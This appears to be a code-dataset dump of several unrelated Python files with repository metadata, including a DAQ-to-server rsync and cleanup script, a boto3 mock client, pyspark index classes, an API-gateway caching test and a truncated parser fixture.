args = ['ssh', runDB['rocks_login'], 'ls -R '+runDB["rocks_dir"]]
ls = sp.Popen(args, stdout=sp.PIPE, stderr=sp.PIPE)
out, err = ls.communicate()
out = out.decode('utf-8')
filelist_rocks = out.split("\n")
filelist_rocks = [f for f in filelist_rocks if ":" not in f and len(f)!=0]
# for f in filelist_rocks:
# print(f)
# make sure all files have successfully transferred
for f in filelist_loc:
fname = f.split("/")[-1]
if len(fname) == 0:
continue
if fname not in filelist_rocks:
print("whoa, ", fname, "not found in remote list!")
exit()
print("All files in:\n {}\nhave been backed up to cenpa-rocks."
.format(datadir_loc))
print("It should be OK to delete local files.")
# don't delete these files, orca needs them
ignore_list = [".Orca", "RunNumber"]
# set these bools to not remove the pygama files
if keep_t1:
ignore_list.append("t1_run")
if keep_t2:
ignore_list.append("t2_run")
# now delete old files, ask for Y/N confirmation
print("OK to delete local files? [y/n]")
if input() in ["y","Y"]:
for f in filelist_loc:
f.replace(" ", "\ ")
if os.path.isfile(f):
if any(ig in f for ig in ignore_list):
continue
print("Deleting:", f)
os.remove(f)
now = datetime.now()
print("Processing is up to date!", now.strftime("%Y-%m-%d %H:%M"))
def download_rocks():
"""
fk , i also need to write a function to recall the raw
files from cenpa-rocks for reprocessing (since for now
all processing happens on the DAQ computer)
"""
print("hi clint")
if __name__=="__main__":
main()
| 29.621849 | 79 | 0.601135 | #!/usr/bin/env python3
import os
import glob
import json
from datetime import datetime
import subprocess as sp
from pprint import pprint
from pygama.utils import *
def main():
"""
sync MJ60 data with cenpa-rocks.
- rsync the entire Data/MJ60 directory using the $DATADIR variable
- set flags to then remove raw/raw_to_dsp/tier2 files
Hopefully we can reuse this script for C1.
"""
global runDB
with open("runDB.json") as f:
runDB = json.load(f)
# run_rsync()
daq_cleanup()
def run_rsync(test=False):
"""
run rsync on the entire $DATADIR/MJ60 folder (can take a while ...)
"""
if "mjcenpa" not in os.environ["USER"]:
print("Error, we're not on the MJ60 DAQ machine. Exiting ...")
exit()
#raw_dir = runDB["loc_dir"] + "/"
raw_dir = os.path.expandvars(runDB["loc_dir"] + "/")
raw_rocks = "{}:{}/".format(runDB["rocks_login"], runDB["rocks_dir"])
if test:
cmd = "rsync -avh --dry-run {} {}".format(raw_dir, raw_rocks)
else:
cmd = "rsync -avh {} {}".format(raw_dir, raw_rocks)
sh(cmd)
def daq_cleanup(keep_t1=False, keep_t2=False):
"""
build a list of files on the DAQ and rocks, check integrity,
and delete files on the DAQ only if we're sure the transfer was successful.
MJ60 and C1 ORCA raw files have "BackgroundRun" in the filenames
"""
if "mjcenpa" not in os.environ["USER"]:
print("Error, we're not on the MJ60 DAQ machine. Exiting ...")
exit()
# local (DAQ) list
datadir_loc = os.path.expandvars(runDB["loc_dir"] + "/")
filelist_loc = glob.glob(datadir_loc + "/**", recursive=True)
# for f in filelist_loc:
# print(f)
# remote list
args = ['ssh', runDB['rocks_login'], 'ls -R '+runDB["rocks_dir"]]
ls = sp.Popen(args, stdout=sp.PIPE, stderr=sp.PIPE)
out, err = ls.communicate()
out = out.decode('utf-8')
filelist_rocks = out.split("\n")
filelist_rocks = [f for f in filelist_rocks if ":" not in f and len(f)!=0]
# for f in filelist_rocks:
# print(f)
# make sure all files have successfully transferred
for f in filelist_loc:
fname = f.split("/")[-1]
if len(fname) == 0:
continue
if fname not in filelist_rocks:
print("whoa, ", fname, "not found in remote list!")
exit()
print("All files in:\n {}\nhave been backed up to cenpa-rocks."
.format(datadir_loc))
print("It should be OK to delete local files.")
# don't delete these files, orca needs them
ignore_list = [".Orca", "RunNumber"]
# set these bools to not remove the pygama files
if keep_t1:
ignore_list.append("t1_run")
if keep_t2:
ignore_list.append("t2_run")
# now delete old files, ask for Y/N confirmation
print("OK to delete local files? [y/n]")
if input() in ["y","Y"]:
for f in filelist_loc:
f.replace(" ", "\ ")
if os.path.isfile(f):
if any(ig in f for ig in ignore_list):
continue
print("Deleting:", f)
os.remove(f)
now = datetime.now()
print("Processing is up to date!", now.strftime("%Y-%m-%d %H:%M"))
def download_rocks():
"""
fk , i also need to write a function to recall the raw
files from cenpa-rocks for reprocessing (since for now
all processing happens on the DAQ computer)
"""
print("hi clint")
if __name__=="__main__":
main()
| 0 | 0 | 0 |
61df2b933869a21dbcd5ef0a8ddbcdd052aeb71c | 453 | py | Python | VHDTools/PyVinil/setup.py | maerd-zinbieL/x86 | 88a5ba9894a5f1319dd3aff13696ecf73803c765 | [
"MIT"
] | null | null | null | VHDTools/PyVinil/setup.py | maerd-zinbieL/x86 | 88a5ba9894a5f1319dd3aff13696ecf73803c765 | [
"MIT"
] | null | null | null | VHDTools/PyVinil/setup.py | maerd-zinbieL/x86 | 88a5ba9894a5f1319dd3aff13696ecf73803c765 | [
"MIT"
] | null | null | null | from distutils.core import setup
setup(
name='PyVinil',
version='0.1.0',
author='Igor Bonadio',
author_email='igorbonadio@gmail.com',
packages=['pyvinil', 'pyvinil.test'],
url='https://github.com/igorbonadio/pyvinil',
license='LICENSE.txt',
description='PyVinil is a Python library, which uses Vinil (a C library), for creating, reading and writing virtual hard disks.',
long_description=open('README.txt').read(),
) | 34.846154 | 133 | 0.693157 | from distutils.core import setup
setup(
name='PyVinil',
version='0.1.0',
author='Igor Bonadio',
author_email='igorbonadio@gmail.com',
packages=['pyvinil', 'pyvinil.test'],
url='https://github.com/igorbonadio/pyvinil',
license='LICENSE.txt',
description='PyVinil is a Python library, which uses Vinil (a C library), for creating, reading and writing virtual hard disks.',
long_description=open('README.txt').read(),
) | 0 | 0 | 0 |
db5922ac640569bd2ff71faaaf243e178ad47431 | 8,641 | py | Python | boto3_mock/mock_client.py | yutaka-kabu/pandas-redshift | 1e5f808d110ca82b77b28a383695743622e14d27 | [
"BSD-3-Clause"
] | null | null | null | boto3_mock/mock_client.py | yutaka-kabu/pandas-redshift | 1e5f808d110ca82b77b28a383695743622e14d27 | [
"BSD-3-Clause"
] | 3 | 2021-08-10T01:01:59.000Z | 2021-08-10T02:39:37.000Z | boto3_mock/mock_client.py | yutaka-kabu/pandas-redshift | 1e5f808d110ca82b77b28a383695743622e14d27 | [
"BSD-3-Clause"
] | 1 | 2021-09-24T02:19:57.000Z | 2021-09-24T02:19:57.000Z | import copy
import jsonschema
from jsonschema import ValidationError
from datetime import datetime
from dateutil.tz import tzlocal
from botocore import xform_name
from botocore.model import ServiceModel
from botocore.serialize import create_serializer
import botocore.session
botocore_session = botocore.session.get_session()
botocore_loader = botocore_session.get_component("data_loader")
| 33.10728 | 78 | 0.594607 | import copy
import jsonschema
from jsonschema import ValidationError
from datetime import datetime
from dateutil.tz import tzlocal
from botocore import xform_name
from botocore.model import ServiceModel
from botocore.serialize import create_serializer
import botocore.session
botocore_session = botocore.session.get_session()
botocore_loader = botocore_session.get_component("data_loader")
def load_service_description(service_name):
service_description = botocore_loader.load_service_model(
service_name, "service-2", api_version=None
)
return service_description
class MockClient(object):
__instances = {}
# To deal with datetime objects in boto3 response with string
_TIMESTAMP_PATTERN = (
"^(Mon|Tue|Wed|Thu|Fri|Sat|Sun), "
"[0-9]{2} (Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec) [0-9]{4}"
" [0-9]{2}:[0-9]{2}:[0-9]{2}\\.[0-9]{6}$"
)
_TIMESTAMP_DESCRIPTION = "timestamp"
_TYPE_MAP = {
"blob": "string",
"boolean": "boolean",
"double": "number",
"float": "number",
"integer": "integer",
"list": "array",
"long": "integer",
"string": "string",
"structure": "object",
"timestamp": "string",
}
_RESPONSE_METADATA_SCHEMA = {
"type": "object",
"required": [
"RequestId",
"HTTPStatusCode",
"HTTPHeaders",
"RetryAttempts",
],
"properties": {
"RequestId": {"type": "string"},
"HTTPStatusCode": {"type": "integer"},
"HTTPHeaders": {
"type": "object",
"additionalProperties": {"type": "string"},
},
"RetryAttempts": {"type": "integer"},
},
"additionalProperties": True,
}
def _add_response_metadata_schema(self, operation_name, schema):
schema_properties = schema["properties"]
schema_properties["ResponseMetadata"] = self._RESPONSE_METADATA_SCHEMA
def _shape_to_schema(self, shape, shapes):
shape_info = shapes[shape]
shape_type = shape_info["type"]
schema = {"type": MockClient._TYPE_MAP[shape_type]}
if shape_type == "list":
member = shape_info["member"]
member_shape = member["shape"]
if "min" in shape_info:
schema["minItems"] = shape_info["min"]
if "max" in shape_info:
schema["maxItems"] = shape_info["max"]
schema["items"] = self._shape_to_schema(member_shape, shapes)
return schema
if shape_type == "structure":
if "required" in shape_info:
schema["required"] = shape_info["required"]
properties = schema.setdefault("properties", {})
for member_name, member_info in shape_info["members"].items():
member_shape = member_info["shape"]
properties[member_name] = self._shape_to_schema(
member_shape, shapes
)
if "additionalProperties" not in schema:
schema["additionalProperties"] = False
return schema
if "enum" in shape_info:
schema["enum"] = shape_info["enum"]
if "min" in shape_info:
if shape_type == "string":
schema["minLength"] = shape_info["min"]
else:
schema["minimum"] = shape_info["min"]
if "max" in shape_info:
if shape_type == "string":
schema["maxLength"] = shape_info["max"]
else:
schema["maximum"] = shape_info["max"]
if "pattern" in shape_info:
schema["pattern"] = shape_info["pattern"]
if shape_type == "timestamp":
schema["pattern"] = self._TIMESTAMP_PATTERN
schema["description"] = self._TIMESTAMP_DESCRIPTION
return schema
def _extract_schema(self, operation_name, shape, shapes):
schema = self._shape_to_schema(shape, shapes)
return schema
def _extract_schemas(self, service_description):
schemas = {}
operations = service_description["operations"]
shapes = service_description["shapes"]
for operation_name, operation_info in operations.items():
if "output" not in operation_info:
continue
output_info = operation_info["output"]
schemas[operation_name] = self._extract_schema(
operation_name, output_info["shape"], shapes
)
self._add_response_metadata_schema(
operation_name, schemas[operation_name]
)
return schemas
@classmethod
def get_instance(cls, service_name):
if service_name not in cls.__instances:
cls._add_methods(service_name)
cls.__instances[service_name] = cls.__private_init__(
super(MockClient, cls).__new__(cls), service_name
)
return cls.__instances[service_name]
def __new__(cls, *args, **kwargs):
raise NotImplementedError("Cannot initialize via Constructor")
@classmethod
def __private_init__(cls, self, service_name):
self.service_name = service_name
service_description = load_service_description(service_name)
service_description_copy = copy.deepcopy(service_description)
self.schemas = self._extract_schemas(service_description_copy)
self._mocks = {}
return self
def validate_response(self, operation_name, response_dict):
response_schema = self.schemas[operation_name]
jsonschema.validate(response_dict, response_schema)
def set_mock(self, operation_name, mock):
self._mocks[operation_name] = mock
@classmethod
def _add_methods(cls, service_name):
service_description = load_service_description(service_name)
service_model = ServiceModel(
service_description, service_name=service_name
)
operations = service_description["operations"]
for operation_key, operation_info in operations.items():
operation_name = operation_info["name"]
method = cls._create_method(operation_name, service_model)
setattr(cls, method.__name__, method)
def _convert_response(self, response, schema):
response_type = schema["type"]
if response_type == "object":
properties = schema.get("properties", {})
for key, item_schema in properties.items():
if key not in response:
continue
response[key] = self._convert_response(
response[key], item_schema
)
return response
if response_type == "array":
item_schema = schema["items"]
for index in range(len(response)):
response[index] = self._convert_response(
response[index], item_schema
)
return response
if response_type == "string":
if schema.get("description", "") == self._TIMESTAMP_DESCRIPTION:
dt = datetime.strptime(response, "%a, %d %b %Y %H:%M:%S.%f")
dt = dt.replace(tzinfo=tzlocal())
return dt
return response
@classmethod
def _create_method(cls, operation_name, service_model):
method_name = xform_name(operation_name)
operation_model = service_model.operation_model(operation_name)
protocol = service_model.metadata["protocol"]
serializer = create_serializer(protocol)
def _make_api_call_mock(self, *args, **kwargs):
if args:
raise TypeError(
"{}() only accepts keyword arguments.".format(method_name)
)
api_params = kwargs
serializer.serialize_to_request(api_params, operation_model)
mock = self._mocks.get(operation_name)
if not mock:
raise NotImplementedError(
"The mock for {}() has not been set.".format(method_name)
)
try:
response_dict = mock(*args, **kwargs)
self.validate_response(operation_name, response_dict)
schema = self.schemas[operation_name]
return self._convert_response(response_dict, schema)
except ValidationError:
raise
_make_api_call_mock.__name__ = str(method_name)
return _make_api_call_mock
| 6,592 | 1,606 | 46 |
cf09709decd334b101b925de361fe7d9fdd3b7a0 | 1,240 | py | Python | bbdev/utils.py | ekivemark/BlueButtonDev | c751a5c52a83df6b97ef2c653a4492d959610c42 | [
"Apache-2.0"
] | null | null | null | bbdev/utils.py | ekivemark/BlueButtonDev | c751a5c52a83df6b97ef2c653a4492d959610c42 | [
"Apache-2.0"
] | 7 | 2020-02-11T23:00:50.000Z | 2021-12-13T19:41:39.000Z | bbdev/utils.py | ekivemark/BlueButtonDev | c751a5c52a83df6b97ef2c653a4492d959610c42 | [
"Apache-2.0"
] | 2 | 2018-10-06T21:46:22.000Z | 2020-10-10T16:10:42.000Z | """
bluebuttondev.bbdev
FILE: utils
Created: 6/16/15 12:11 AM
Basic conversion tools
"""
__author__ = 'Mark Scrimshire:@ekivemark'
def email_mask(email=""):
"""
mask and potentially shorten an email address
Useful for communications
:param email:
:return:
"""
if email=="":
return None
domain = "@"+email.split("@")[1]
tld = "."+domain.split(".")[1]
if settings.DEBUG:
print("Domain:",domain)
result_email = email[:2]+"**" + domain[:2] + "**" + tld[:2] + "**"
return result_email | 20 | 70 | 0.565323 | """
bluebuttondev.bbdev
FILE: utils
Created: 6/16/15 12:11 AM
Basic conversion tools
"""
__author__ = 'Mark Scrimshire:@ekivemark'
def str2int(inp):
output = 0 + int(inp)
return output
def str2bool(inp):
output = False
if inp.upper() == "TRUE":
output = True
elif inp.upper() == "FALSE":
output = False
return output
def email_domain(email, at=False):
# get email domain from an email field.
if at == False:
return email.split('@')[1].rstrip()
else:
# include the @
return "@" + email.split('@')[1].rstrip()
def email_name(email, at=False):
# get email username from an email field.
if at == False:
return email.split('@')[0].rstrip()
else:
# include the @
return email.split('@')[0].rstrip()+"@"
def email_mask(email=""):
"""
mask and potentially shorten an email address
Useful for communications
:param email:
:return:
"""
if email=="":
return None
domain = "@"+email.split("@")[1]
tld = "."+domain.split(".")[1]
if settings.DEBUG:
print("Domain:",domain)
result_email = email[:2]+"**" + domain[:2] + "**" + tld[:2] + "**"
return result_email | 592 | 0 | 92 |
9c243c1755c8320c9607913fee3e4483abf4735a | 2,026 | py | Python | testsuite/tests/apicast/policy/caching/test_caching_policy_allow.py | dlaso99/3scale-tests | b31a3b3596af6d632b393e383c0417ea56bd95ca | [
"Apache-2.0"
] | 5 | 2021-11-04T14:09:24.000Z | 2021-12-23T13:48:36.000Z | testsuite/tests/apicast/policy/caching/test_caching_policy_allow.py | dlaso99/3scale-tests | b31a3b3596af6d632b393e383c0417ea56bd95ca | [
"Apache-2.0"
] | 41 | 2021-11-03T14:27:21.000Z | 2022-03-29T14:46:16.000Z | testsuite/tests/apicast/policy/caching/test_caching_policy_allow.py | dlaso99/3scale-tests | b31a3b3596af6d632b393e383c0417ea56bd95ca | [
"Apache-2.0"
] | 12 | 2021-11-03T17:28:31.000Z | 2021-11-30T12:28:25.000Z | """
Rewrite spec/functional_specs/policies/caching/caching_allow_policy_spec.rb
"""
import pytest
from testsuite import rawobj
from testsuite.capabilities import Capability
@pytest.fixture(scope="module")
def policy_settings():
"Add caching policy configured as 'caching_type': 'allow'"
return rawobj.PolicyConfig("caching", {"caching_type": "allow"})
@pytest.mark.required_capabilities(Capability.SCALING)
def test_caching_policy_allow(prod_client, openshift, application):
"""
Test caching policy with caching mode set to Allow
To cache credentials:
- make request to production gateway with valid credentials
- make request to production gateway with invalid credentials
Scale backend-listener down
Test if:
- response with valid credentials have status_code == 200
- response with same invalid credentials as before have status_code == 403
- response with new invalid credentials have status_code == 200
Scale backend-listener up to old value
"""
client = prod_client()
client.auth = None
auth = application.authobj()
response = client.get("/", auth=auth)
assert response.status_code == 200
response = client.get("/", params={"user_key": ":user_key"})
assert response.status_code == 403
with openshift().scaler.scale("backend-listener", 0):
# Test if response succeed on production calls with valid credentials
for _ in range(3):
response = client.get("/", auth=auth)
assert response.status_code == 200
# Test if response fail on production calls with known invalid credentials
for _ in range(3):
response = client.get("/", params={"user_key": ":user_key"})
assert response.status_code == 403
# Test if response succeed on production calls with unknown invalid credentials
for _ in range(3):
response = client.get("/", params={"user_key": ":123"})
assert response.status_code == 200
| 36.178571 | 87 | 0.685094 | """
Rewrite spec/functional_specs/policies/caching/caching_allow_policy_spec.rb
"""
import pytest
from testsuite import rawobj
from testsuite.capabilities import Capability
@pytest.fixture(scope="module")
def policy_settings():
"Add caching policy configured as 'caching_type': 'allow'"
return rawobj.PolicyConfig("caching", {"caching_type": "allow"})
@pytest.mark.required_capabilities(Capability.SCALING)
def test_caching_policy_allow(prod_client, openshift, application):
"""
Test caching policy with caching mode set to Allow
To cache credentials:
- make request to production gateway with valid credentials
- make request to production gateway with invalid credentials
Scale backend-listener down
Test if:
- response with valid credentials have status_code == 200
- response with same invalid credentials as before have status_code == 403
- response with new invalid credentials have status_code == 200
Scale backend-listener up to old value
"""
client = prod_client()
client.auth = None
auth = application.authobj()
response = client.get("/", auth=auth)
assert response.status_code == 200
response = client.get("/", params={"user_key": ":user_key"})
assert response.status_code == 403
with openshift().scaler.scale("backend-listener", 0):
# Test if response succeed on production calls with valid credentials
for _ in range(3):
response = client.get("/", auth=auth)
assert response.status_code == 200
# Test if response fail on production calls with known invalid credentials
for _ in range(3):
response = client.get("/", params={"user_key": ":user_key"})
assert response.status_code == 403
# Test if response succeed on production calls with unknown invalid credentials
for _ in range(3):
response = client.get("/", params={"user_key": ":123"})
assert response.status_code == 200
| 0 | 0 | 0 |
ceb1b9eef7aadc583f322e87617783f52bf1e3a2 | 5,475 | py | Python | python/pyspark/pandas/indexes/numeric.py | akhalymon-cv/spark | 76191b9151b6a7804f8894e53eef74106f98b787 | [
"Apache-2.0"
] | 35,083 | 2015-01-01T03:05:13.000Z | 2022-03-31T21:57:40.000Z | python/pyspark/pandas/indexes/numeric.py | akhalymon-cv/spark | 76191b9151b6a7804f8894e53eef74106f98b787 | [
"Apache-2.0"
] | 32,117 | 2015-01-01T00:00:24.000Z | 2022-03-31T23:54:58.000Z | python/pyspark/pandas/indexes/numeric.py | akhalymon-cv/spark | 76191b9151b6a7804f8894e53eef74106f98b787 | [
"Apache-2.0"
] | 29,687 | 2015-01-01T02:40:43.000Z | 2022-03-31T16:49:33.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Any, Optional, Union, cast
import pandas as pd
from pandas.api.types import is_hashable
from pyspark import pandas as ps
from pyspark.pandas._typing import Dtype, Name
from pyspark.pandas.indexes.base import Index
from pyspark.pandas.series import Series
class NumericIndex(Index):
"""
Provide numeric type operations.
This is an abstract class.
"""
pass
class IntegerIndex(NumericIndex):
"""
This is an abstract class for Int64Index.
"""
pass
class Int64Index(IntegerIndex):
"""
Immutable sequence used for indexing and alignment. The basic object
storing axis labels for all pandas objects. Int64Index is a special case
of `Index` with purely integer labels.
Parameters
----------
data : array-like (1-dimensional)
dtype : NumPy dtype (default: int64)
copy : bool
Make a copy of input ndarray.
name : object
Name to be stored in the index.
See Also
--------
Index : The base pandas-on-Spark Index type.
Float64Index : A special case of :class:`Index` with purely float labels.
Notes
-----
An Index instance can **only** contain hashable objects.
Examples
--------
>>> ps.Int64Index([1, 2, 3])
Int64Index([1, 2, 3], dtype='int64')
From a Series:
>>> s = ps.Series([1, 2, 3], index=[10, 20, 30])
>>> ps.Int64Index(s)
Int64Index([1, 2, 3], dtype='int64')
From an Index:
>>> idx = ps.Index([1, 2, 3])
>>> ps.Int64Index(idx)
Int64Index([1, 2, 3], dtype='int64')
"""
class Float64Index(NumericIndex):
"""
Immutable sequence used for indexing and alignment. The basic object
storing axis labels for all pandas objects. Float64Index is a special case
of `Index` with purely float labels.
Parameters
----------
data : array-like (1-dimensional)
dtype : NumPy dtype (default: float64)
copy : bool
Make a copy of input ndarray.
name : object
Name to be stored in the index.
See Also
--------
Index : The base pandas-on-Spark Index type.
Int64Index : A special case of :class:`Index` with purely integer labels.
Notes
-----
An Index instance can **only** contain hashable objects.
Examples
--------
>>> ps.Float64Index([1.0, 2.0, 3.0])
Float64Index([1.0, 2.0, 3.0], dtype='float64')
From a Series:
>>> s = ps.Series([1, 2, 3], index=[10, 20, 30])
>>> ps.Float64Index(s)
Float64Index([1.0, 2.0, 3.0], dtype='float64')
From an Index:
>>> idx = ps.Index([1, 2, 3])
>>> ps.Float64Index(idx)
Float64Index([1.0, 2.0, 3.0], dtype='float64')
"""
if __name__ == "__main__":
_test()
| 27.651515 | 99 | 0.628493 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Any, Optional, Union, cast
import pandas as pd
from pandas.api.types import is_hashable
from pyspark import pandas as ps
from pyspark.pandas._typing import Dtype, Name
from pyspark.pandas.indexes.base import Index
from pyspark.pandas.series import Series
class NumericIndex(Index):
"""
Provide numeric type operations.
This is an abstract class.
"""
pass
class IntegerIndex(NumericIndex):
"""
This is an abstract class for Int64Index.
"""
pass
class Int64Index(IntegerIndex):
"""
Immutable sequence used for indexing and alignment. The basic object
storing axis labels for all pandas objects. Int64Index is a special case
of `Index` with purely integer labels.
Parameters
----------
data : array-like (1-dimensional)
dtype : NumPy dtype (default: int64)
copy : bool
Make a copy of input ndarray.
name : object
Name to be stored in the index.
See Also
--------
Index : The base pandas-on-Spark Index type.
Float64Index : A special case of :class:`Index` with purely float labels.
Notes
-----
An Index instance can **only** contain hashable objects.
Examples
--------
>>> ps.Int64Index([1, 2, 3])
Int64Index([1, 2, 3], dtype='int64')
From a Series:
>>> s = ps.Series([1, 2, 3], index=[10, 20, 30])
>>> ps.Int64Index(s)
Int64Index([1, 2, 3], dtype='int64')
From an Index:
>>> idx = ps.Index([1, 2, 3])
>>> ps.Int64Index(idx)
Int64Index([1, 2, 3], dtype='int64')
"""
def __new__(
cls,
data: Optional[Any] = None,
dtype: Optional[Union[str, Dtype]] = None,
copy: bool = False,
name: Optional[Name] = None,
) -> "Int64Index":
if not is_hashable(name):
raise TypeError("Index.name must be a hashable type")
if isinstance(data, (Series, Index)):
if dtype is None:
dtype = "int64"
return cast(Int64Index, Index(data, dtype=dtype, copy=copy, name=name))
return cast(
Int64Index, ps.from_pandas(pd.Int64Index(data=data, dtype=dtype, copy=copy, name=name))
)
class Float64Index(NumericIndex):
"""
Immutable sequence used for indexing and alignment. The basic object
storing axis labels for all pandas objects. Float64Index is a special case
of `Index` with purely float labels.
Parameters
----------
data : array-like (1-dimensional)
dtype : NumPy dtype (default: float64)
copy : bool
Make a copy of input ndarray.
name : object
Name to be stored in the index.
See Also
--------
Index : The base pandas-on-Spark Index type.
Int64Index : A special case of :class:`Index` with purely integer labels.
Notes
-----
An Index instance can **only** contain hashable objects.
Examples
--------
>>> ps.Float64Index([1.0, 2.0, 3.0])
Float64Index([1.0, 2.0, 3.0], dtype='float64')
From a Series:
>>> s = ps.Series([1, 2, 3], index=[10, 20, 30])
>>> ps.Float64Index(s)
Float64Index([1.0, 2.0, 3.0], dtype='float64')
From an Index:
>>> idx = ps.Index([1, 2, 3])
>>> ps.Float64Index(idx)
Float64Index([1.0, 2.0, 3.0], dtype='float64')
"""
def __new__(
cls,
data: Optional[Any] = None,
dtype: Optional[Union[str, Dtype]] = None,
copy: bool = False,
name: Optional[Name] = None,
) -> "Float64Index":
if not is_hashable(name):
raise TypeError("Index.name must be a hashable type")
if isinstance(data, (Series, Index)):
if dtype is None:
dtype = "float64"
return cast(Float64Index, Index(data, dtype=dtype, copy=copy, name=name))
return cast(
Float64Index,
ps.from_pandas(pd.Float64Index(data=data, dtype=dtype, copy=copy, name=name)),
)
def _test() -> None:
import os
import doctest
import sys
from pyspark.sql import SparkSession
import pyspark.pandas.indexes.numeric
os.chdir(os.environ["SPARK_HOME"])
globs = pyspark.pandas.indexes.numeric.__dict__.copy()
globs["ps"] = pyspark.pandas
spark = (
SparkSession.builder.master("local[4]")
.appName("pyspark.pandas.indexes.numeric tests")
.getOrCreate()
)
(failure_count, test_count) = doctest.testmod(
pyspark.pandas.indexes.numeric,
globs=globs,
optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE,
)
spark.stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
| 1,889 | 0 | 77 |
2357e757eeab0c39ba22803f30a4f577979d9970 | 2,010 | py | Python | common/func_plots.py | jdvelasq/demand-forecast-using-time-series-clustering | 5d08f225076dbd370944202143e85e46a8962655 | [
"MIT"
] | null | null | null | common/func_plots.py | jdvelasq/demand-forecast-using-time-series-clustering | 5d08f225076dbd370944202143e85e46a8962655 | [
"MIT"
] | null | null | null | common/func_plots.py | jdvelasq/demand-forecast-using-time-series-clustering | 5d08f225076dbd370944202143e85e46a8962655 | [
"MIT"
] | 1 | 2021-07-17T19:28:24.000Z | 2021-07-17T19:28:24.000Z | from statsmodels.graphics.tsaplots import plot_acf
from statsmodels.graphics.tsaplots import plot_pacf
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
__author__ = "Jose Fernando Montoya Cardona"
__credits__ = ["Jose Fernando Montoya Cardona"]
__email__ = "jomontoyac@unal.edu.co"
| 36.545455 | 110 | 0.681592 | from statsmodels.graphics.tsaplots import plot_acf
from statsmodels.graphics.tsaplots import plot_pacf
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
__author__ = "Jose Fernando Montoya Cardona"
__credits__ = ["Jose Fernando Montoya Cardona"]
__email__ = "jomontoyac@unal.edu.co"
def get_plot_pca(ev):
(figure, ax) = plt.subplots(figsize=(10, 6))
ax.plot(ev['n_components'], ev['Cum_explained_variance'], '--')
ax.set_title("Varianza explicada por componente", fontsize=15)
ax.set_xlabel('Número de componentes', fontsize=15)
ax.set_ylabel('Varianza acumulada', fontsize=15)
plt.show()
def get_plot_n_dim_to_two_dim(m_features, labels):
x_embedded = TSNE(n_components=2).fit_transform(m_features)
df_x_embedded = pd.DataFrame([x_embedded[:, 0], x_embedded[:, 1], labels]).transpose()
df_x_embedded.columns = ['X1', 'X2', 'y']
df_x_embedded.plot.scatter(x='X1', y='X2', c='y', colormap='tab10', figsize=(20, 10), legend=True)
plt.show()
def get_plot_line(df_dem, idx_date=False):
(figure, ax) = plt.subplots(figsize=(25, 5))
if idx_date:
df_dem.plot(ax=ax)
else:
df_dem.reset_index(drop=True).plot(ax=ax)
plt.show()
def get_plot_acf_pacf(data, cod_or=None, type_day=None, n_lags=24*20, v_alpha=0.05, w_diff=False, num_diff=1):
if w_diff:
for i in range(1, num_diff+1):
data = data.diff(periods=1)
data = data[~np.isnan(data)]
data = data[~np.isnan(data)]
(figure1, ax1) = plt.subplots(figsize=(22, 11))
plot_acf(data, lags=n_lags, alpha=v_alpha, ax=ax1)
ax1.set_title('ACF-'+cod_or+'-'+type_day+'_cluster_number-'+data.name)
plt.show()
# (figure2, ax2) = plt.subplots(figsize=(22, 11))
# plot_pacf(data, lags=n_lags, alpha=v_alpha, ax=ax2)
# ax2.set_title('PACF-'+cod_or + '-' + type_day + '_cluster_number-' + data.name)
# plt.show()
# df_train_labels[1].reset_index(drop=True).plot(ax=ax)
| 1,575 | 0 | 92 |
4855f833b139d223b0bf8bfee33e39906051e030 | 952 | py | Python | src/genie/libs/parser/iosxe/tests/ShowStackPower/cli/equal/golden_output_c3850_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 204 | 2018-06-27T00:55:27.000Z | 2022-03-06T21:12:18.000Z | src/genie/libs/parser/iosxe/tests/ShowStackPower/cli/equal/golden_output_c3850_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 468 | 2018-06-19T00:33:18.000Z | 2022-03-31T23:23:35.000Z | src/genie/libs/parser/iosxe/tests/ShowStackPower/cli/equal/golden_output_c3850_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 309 | 2019-01-16T20:21:07.000Z | 2022-03-30T12:56:41.000Z | expected_output = {
"power_stack": {
"Powerstack-1": {
"switch_num": 1,
"allocated_power": 200,
"topology": "Stndaln",
"unused_power": 485,
"power_supply_num": 1,
"total_power": 715,
"mode": "SP-PS",
"reserved_power": 30,
},
"Powerstack-12": {
"switch_num": 1,
"allocated_power": 200,
"topology": "Stndaln",
"unused_power": 485,
"power_supply_num": 1,
"total_power": 715,
"mode": "SP-PS",
"reserved_power": 30,
},
"Powerstack-11": {
"switch_num": 1,
"allocated_power": 295,
"topology": "Stndaln",
"unused_power": 390,
"power_supply_num": 1,
"total_power": 715,
"mode": "SP-PS",
"reserved_power": 30,
},
}
}
| 27.2 | 35 | 0.423319 | expected_output = {
"power_stack": {
"Powerstack-1": {
"switch_num": 1,
"allocated_power": 200,
"topology": "Stndaln",
"unused_power": 485,
"power_supply_num": 1,
"total_power": 715,
"mode": "SP-PS",
"reserved_power": 30,
},
"Powerstack-12": {
"switch_num": 1,
